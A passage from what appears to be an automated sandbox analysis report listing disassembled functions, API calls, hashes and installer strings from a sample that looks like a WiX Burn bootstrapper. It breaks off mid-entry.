                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13C183332091A24EEF6D5239887407EBBE1BE923B131E179DD4F2CB1C5EE209565DE60
                                                                                                                                                                                                                                                                                                  Function 008903D5 Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                                                                                                                                                                                                  • Instruction ID: a151912d8d5f4dd248bfd860ee9da4b368341bc00d1be897e9af766cdd8085b8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCC17F321091A25EEF6D9639847407EBBE1AA923B131F179DD4F2CB1D5EE209534EE20
                                                                                                                                                                                                                                                                                                  Function 0089001D Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                                                                                                                                                                  • Instruction ID: bb9b50077f38ac972ebae46a8efa8085c8afc5ab17066efb923f14cb400541b3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FB184321091A24FEF2D5779883447EBBE1FA923B131E179DD4B2CB1C5EE209565EA20
                                                                                                                                                                                                                                                                                                  Function 00892E47 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4caca7aee468486897544d3bfeb5dba60f2a12944358cdc6207ef4f4711875cc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 774e81a9b15337bce1c9eb6a54d9deec73575330ca68f7334dfcdacfaa27e7e1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4caca7aee468486897544d3bfeb5dba60f2a12944358cdc6207ef4f4711875cc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC613971700B0876DF38BA6C9895BBE63A9FB41704F1C091AF983DF282DA15DE81C356
                                                                                                                                                                                                                                                                                                  Function 0086FF99 Relevance: 84.5, APIs: 1, Strings: 47, Instructions: 484registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 00870592
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                  • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-2755343042
                                                                                                                                                                                                                                                                                                  • Opcode ID: 12a69c3dedcc857617d7ccea2a2354da1330e3a1f7016082ebaf669819bae224
                                                                                                                                                                                                                                                                                                  • Instruction ID: 42cba2dac7e8a827419565f67542939c3351eec67cffb7c2a480586e921b626f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12a69c3dedcc857617d7ccea2a2354da1330e3a1f7016082ebaf669819bae224
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18F11131A41A2AFBDF225668CD06FAEB665FB00718F148110F908F6756CB75ED20EEC5
                                                                                                                                                                                                                                                                                                  Function 0086CDBD Relevance: 73.9, APIs: 3, Strings: 39, Instructions: 366COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,0086545D,00000000,008ACA9C,00865445,00000000), ref: 0086CEF3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to find catalog., xrefs: 0086D1CE
                                                                                                                                                                                                                                                                                                  • Catalog, xrefs: 0086D0EC
                                                                                                                                                                                                                                                                                                  • Payload, xrefs: 0086CDD8
                                                                                                                                                                                                                                                                                                  • Container, xrefs: 0086CF4B
                                                                                                                                                                                                                                                                                                  • Failed to get @Packaging., xrefs: 0086D213
                                                                                                                                                                                                                                                                                                  • LayoutOnly, xrefs: 0086CF8D
                                                                                                                                                                                                                                                                                                  • SourcePath, xrefs: 0086CFB0
                                                                                                                                                                                                                                                                                                  • Failed to hex decode @CertificateRootThumbprint., xrefs: 0086D1C0
                                                                                                                                                                                                                                                                                                  • Failed to to find container: %ls, xrefs: 0086D186
                                                                                                                                                                                                                                                                                                  • Failed to hex decode the Payload/@Hash., xrefs: 0086D1DC
                                                                                                                                                                                                                                                                                                  • Failed to get @FilePath., xrefs: 0086D21A
                                                                                                                                                                                                                                                                                                  • Failed to get @SourcePath., xrefs: 0086D1F1
                                                                                                                                                                                                                                                                                                  • Failed to get @Hash., xrefs: 0086D1E3
                                                                                                                                                                                                                                                                                                  • Failed to get @Catalog., xrefs: 0086D1D5
                                                                                                                                                                                                                                                                                                  • Failed to get @Container., xrefs: 0086D18D
                                                                                                                                                                                                                                                                                                  • Failed to get @FileSize., xrefs: 0086D1AB
                                                                                                                                                                                                                                                                                                  • CertificateRootThumbprint, xrefs: 0086D07A
                                                                                                                                                                                                                                                                                                  • Failed to parse @FileSize., xrefs: 0086D1A1
                                                                                                                                                                                                                                                                                                  • Packaging, xrefs: 0086CEC6
                                                                                                                                                                                                                                                                                                  • Failed to get @CertificateRootThumbprint., xrefs: 0086D1C7
                                                                                                                                                                                                                                                                                                  • payload.cpp, xrefs: 0086CE3F
                                                                                                                                                                                                                                                                                                  • FilePath, xrefs: 0086CEAB
                                                                                                                                                                                                                                                                                                  • Failed to get next node., xrefs: 0086D228
                                                                                                                                                                                                                                                                                                  • Failed to get @DownloadUrl., xrefs: 0086D1EA
                                                                                                                                                                                                                                                                                                  • FileSize, xrefs: 0086D002
                                                                                                                                                                                                                                                                                                  • embedded, xrefs: 0086CF05
                                                                                                                                                                                                                                                                                                  • Hash, xrefs: 0086D0B7
                                                                                                                                                                                                                                                                                                  • download, xrefs: 0086CEE5
                                                                                                                                                                                                                                                                                                  • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0086D1B9
                                                                                                                                                                                                                                                                                                  • Invalid value for @Packaging: %ls, xrefs: 0086D200
                                                                                                                                                                                                                                                                                                  • external, xrefs: 0086CF21
                                                                                                                                                                                                                                                                                                  • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0086D1B2
                                                                                                                                                                                                                                                                                                  • DownloadUrl, xrefs: 0086CFD9
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for payload structs., xrefs: 0086CE49
                                                                                                                                                                                                                                                                                                  • Failed to get @Id., xrefs: 0086D221
                                                                                                                                                                                                                                                                                                  • CertificateRootPublicKeyIdentifier, xrefs: 0086D03D
                                                                                                                                                                                                                                                                                                  • Failed to get @LayoutOnly., xrefs: 0086D197
                                                                                                                                                                                                                                                                                                  • Failed to get payload node count., xrefs: 0086CE10
                                                                                                                                                                                                                                                                                                  • Failed to select payload nodes., xrefs: 0086CDEB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateCompareProcessString
                                                                                                                                                                                                                                                                                                  • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1171520630-3127305756
                                                                                                                                                                                                                                                                                                  • Opcode ID: ae6b4be02ea49251b6cb371386f14ea0f0b5f6b2ac8533a7b72c8ee9ef70a949
                                                                                                                                                                                                                                                                                                  • Instruction ID: 770c21faf8355bef90df0f163219e641b5a2e4a0a5c14124464e9cfcacc2847f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae6b4be02ea49251b6cb371386f14ea0f0b5f6b2ac8533a7b72c8ee9ef70a949
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1C1E671E4072AFBDB219A94CC42FADB664FF06720F120161FA21F7691C7B5EE109791
                                                                                                                                                                                                                                                                                                  Function 00868476 Relevance: 59.8, APIs: 5, Strings: 29, Instructions: 331COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00865445,?,00000000,80070490,?,?,?,?,?,?,?,?,0088C1BF,?,00865445,?), ref: 008684A7
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00865445,?,?,?,?,?,?,?,?,0088C1BF,?,00865445,?,00865445,00865445,Chain), ref: 00868804
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get @Hidden., xrefs: 008687E8
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 008687B9
                                                                                                                                                                                                                                                                                                  • Failed to get @Persisted., xrefs: 008687E1
                                                                                                                                                                                                                                                                                                  • Failed to change variant type., xrefs: 008687DA
                                                                                                                                                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 008687C8
                                                                                                                                                                                                                                                                                                  • Failed to get @Type., xrefs: 00868788
                                                                                                                                                                                                                                                                                                  • Value, xrefs: 00868565
                                                                                                                                                                                                                                                                                                  • Type, xrefs: 008685A3
                                                                                                                                                                                                                                                                                                  • Persisted, xrefs: 0086854A
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 0086878F
                                                                                                                                                                                                                                                                                                  • Initializing hidden variable '%ls', xrefs: 00868671
                                                                                                                                                                                                                                                                                                  • Failed to get next node., xrefs: 008687F6
                                                                                                                                                                                                                                                                                                  • Failed to get variable node count., xrefs: 008684E1
                                                                                                                                                                                                                                                                                                  • Failed to get @Value., xrefs: 00868796
                                                                                                                                                                                                                                                                                                  • version, xrefs: 0086862C
                                                                                                                                                                                                                                                                                                  • Initializing string variable '%ls' to value '%ls', xrefs: 0086861A
                                                                                                                                                                                                                                                                                                  • Initializing numeric variable '%ls' to value '%ls', xrefs: 008685E2
                                                                                                                                                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 008687A7
                                                                                                                                                                                                                                                                                                  • Failed to set variant encryption, xrefs: 0086879D
                                                                                                                                                                                                                                                                                                  • Variable, xrefs: 008684B1
                                                                                                                                                                                                                                                                                                  • numeric, xrefs: 008685BC
                                                                                                                                                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 008687D2
                                                                                                                                                                                                                                                                                                  • Hidden, xrefs: 0086852F
                                                                                                                                                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 008686C6
                                                                                                                                                                                                                                                                                                  • Failed to get @Id., xrefs: 008687EF
                                                                                                                                                                                                                                                                                                  • string, xrefs: 008685F7
                                                                                                                                                                                                                                                                                                  • Initializing version variable '%ls' to value '%ls', xrefs: 00868653
                                                                                                                                                                                                                                                                                                  • Failed to select variable nodes., xrefs: 008684C4
                                                                                                                                                                                                                                                                                                  • Invalid value for @Type: %ls, xrefs: 00868778
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-1614826165
                                                                                                                                                                                                                                                                                                  • Opcode ID: 71d3df8d045bbcf2ccae8a7e54e0c23dcabee834a44dd70bc2f5fd0597a40e53
                                                                                                                                                                                                                                                                                                  • Instruction ID: e6e65c15091dfb334bddf9abac4683d323b66b924e5d2e13d6c18eb18f1a4482
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71d3df8d045bbcf2ccae8a7e54e0c23dcabee834a44dd70bc2f5fd0597a40e53
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AB1B172D40229FBDB119B98CC45EAEBBB4FF05720F220355F518F6690CB759A40DB91
                                                                                                                                                                                                                                                                                                  Function 00886CCC Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 379COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,0087BDDC,00000007,?,?,?), ref: 00886D20
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 0088710F
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00887123
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to find Windows directory., xrefs: 00886D5F
                                                                                                                                                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 00886DFC
                                                                                                                                                                                                                                                                                                  • "%ls" "%ls" /quiet /norestart, xrefs: 00886E48
                                                                                                                                                                                                                                                                                                  • Failed to determine WOW64 status., xrefs: 00886D32
                                                                                                                                                                                                                                                                                                  • Failed to ensure WU service was enabled to install MSU package., xrefs: 00886F2E
                                                                                                                                                                                                                                                                                                  • D, xrefs: 00886F3B
                                                                                                                                                                                                                                                                                                  • Failed to append log switch to MSU command-line., xrefs: 00886EB6
                                                                                                                                                                                                                                                                                                  • Failed to format MSU install command., xrefs: 00886E5C
                                                                                                                                                                                                                                                                                                  • Failed to build MSU path., xrefs: 00886E35
                                                                                                                                                                                                                                                                                                  • Bootstrapper application aborted during MSU progress., xrefs: 00887054
                                                                                                                                                                                                                                                                                                  • Failed to wait for executable to complete: %ls, xrefs: 0088709E
                                                                                                                                                                                                                                                                                                  • Failed to get action arguments for MSU package., xrefs: 00886DD6
                                                                                                                                                                                                                                                                                                  • /log:, xrefs: 00886EA2
                                                                                                                                                                                                                                                                                                  • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 00886E75
                                                                                                                                                                                                                                                                                                  • Failed to get process exit code., xrefs: 0088702C
                                                                                                                                                                                                                                                                                                  • WixBundleExecutePackageCacheFolder, xrefs: 00886E0B, 0088713B
                                                                                                                                                                                                                                                                                                  • 2, xrefs: 00886FB3
                                                                                                                                                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 00886F9A
                                                                                                                                                                                                                                                                                                  • Failed to format MSU uninstall command., xrefs: 00886E89
                                                                                                                                                                                                                                                                                                  • msuengine.cpp, xrefs: 00886F8D, 00887022, 0088704A
                                                                                                                                                                                                                                                                                                  • SysNative\, xrefs: 00886D6A
                                                                                                                                                                                                                                                                                                  • Failed to append SysNative directory., xrefs: 00886D7D
                                                                                                                                                                                                                                                                                                  • Failed to append log path to MSU command-line., xrefs: 00886ED4
                                                                                                                                                                                                                                                                                                  • Failed to find System32 directory., xrefs: 00886D95
                                                                                                                                                                                                                                                                                                  • wusa.exe, xrefs: 00886DA0
                                                                                                                                                                                                                                                                                                  • Failed to allocate WUSA.exe path., xrefs: 00886DB3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                                                                                                                                                                  • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 1400713077-4261965642
                                                                                                                                                                                                                                                                                                  • Opcode ID: 98ddd72d4d036e72b7fcb894cb99939258fbf3ee47eb4cb59a0c2ae386cb4b2e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 455bdf304a4dd4a2aaec814f8d455cb9a02ba7272ccea2d704fcbba46679890b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98ddd72d4d036e72b7fcb894cb99939258fbf3ee47eb4cb59a0c2ae386cb4b2e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87D19071A4070ABAEB11AFA8CD85FEEBBB8FF18704F200025F610E6251E7B5D9509B51
                                                                                                                                                                                                                                                                                                  Function 0088D43E Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 290synchronizationprocessCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 0088D4B3
                                                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 0088D4DC
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 0088D5C5
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0088D5CF
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 0088D668
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(008AB500,000000FF,?,?,?,?), ref: 0088D673
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(008AB500,?,?,?,?), ref: 0088D69D
                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0088D6BE
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0088D6CC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0088D704
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: WaitForSingleObject.KERNEL32(?,000000FF,771B30B0,00000000,?,?,?,?,0088D642,?), ref: 0088D357
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: ReleaseMutex.KERNEL32(?,?,?,?,0088D642,?), ref: 0088D375
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0088D3B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: ReleaseMutex.KERNEL32(?), ref: 0088D3CD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: SetEvent.KERNEL32(?), ref: 0088D3D6
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0088D7B9
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0088D7D1
                                                                                                                                                                                                                                                                                                  Strings
